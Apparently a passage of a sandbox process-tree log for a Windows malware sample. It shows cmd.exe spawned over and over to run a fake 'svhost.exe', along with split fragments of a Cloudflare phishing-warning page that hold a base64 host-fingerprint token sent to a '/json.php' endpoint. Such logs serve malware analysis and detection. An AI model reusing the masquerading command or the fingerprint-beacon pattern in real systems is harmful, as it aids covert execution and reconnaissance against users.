        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1716
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6140
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6288
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6504
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6616
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6720
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6780
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6840
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6912
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6972
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7152
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6324
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6668
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6856
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6644
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6988
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7108
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6940
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3436
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6476
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6796
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6864
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6216
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6748
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7012
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7268
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7408
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7572
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7680
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8000
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8136
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6352
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7036
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7244
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7120
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7464
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1912
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7796
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7848
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7912
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7964
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7672
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7776
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3476
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7504
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5264
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7192
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:212
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7592
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8136
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5476
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7736
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6296
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7300
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7792
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6876
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7260
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5468
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4424
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6608
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:456
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7132
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6644
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7108
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7504
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4472
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8040
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5520
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5468
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6752
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8284
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4668
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8528
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7968
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6384
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8812
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:212
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8928
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8788
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9100
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3952
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1956
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5800
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3352
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c <!DOCTYPE html>     <html class="no-js" lang="en-US">  <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />  <style>body{margin:0;padding:0}</style>  <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script>  </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <p> <a href="https://www.cloudflare.com/learning/ac
        5⤵
        
        PID:8368
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5084
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c cess-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="oWrbbzKZNlN4zdvCRyyDReAlRsITA4R6pcDZ_hHvJqY-1731967098-0.0.1.1-/json.php?token=ewogICJjcHVDb3JlcyI6ICI4IiwKICAidG90YWxNZW1vcnkiOiAiODE5MiBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIk9GR0FEVVNFIiwKICAib3NWZXJzaW9uIjogIk1pY3Jvc29mdCBXaW5kb3dzIDEwIiwKICAicHJvY2Vzc29yTmFtZSI6ICJJbnRlbCBDb3JlIFByb2Nlc3NvciAoQnJvYWR3ZWxsKSIsCiAgInN5c3RlbU1vZGVsIjogIlVua25vd24gTW9kZWwiLAogICJjb25maWd1cmF0aW9uIjogIjMiLAogICJ0b2tlbiI6ICJZb3VyX1NlY3JldF9Ub2tlbiIKfQ=="> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:
        5⤵
        
        PID:8380
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8420
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8452
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8824
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9068
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:444
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1620
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7548
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c mb-1">Cloudflare Ray ID: <strong class="font-semibold">8e4b389ff9d1cd8a</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">181.215.176.83</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div> </div> </div> <script> window._cf_translation = {}; </script> </body> </html>
        5⤵
        
        PID:6628
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1308
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6688
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6004
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1520
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8560
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2976
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8348
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7468
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8584
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5600
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8836
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8988
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9044
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8300
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8000
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8384
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6600
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5156
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7268
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7684
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7568
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1188
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9016
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9144
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8348
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8944
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7804
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6072
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7712
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9088
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7384
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7324
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5444
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:864
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1672
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4216
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7516
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8868
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8896
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2012
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8296
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6416
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2788
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6420
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2976
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9036
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6400
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8052
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3264
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7652
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8424
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8468
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7148
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1896
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8432
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1812
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6652
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9120
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7532
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7776
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3140
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:880
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4680
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6712
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2304
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1532
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2772
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8156
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6952
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6292
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7804
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8748
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5760
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7004
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9112
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8180
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7700
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3724
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6228
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8432
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8904
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6584
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:7240
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4380
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3020
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8444
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:9032
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6400
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2644
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:8440
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5800
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
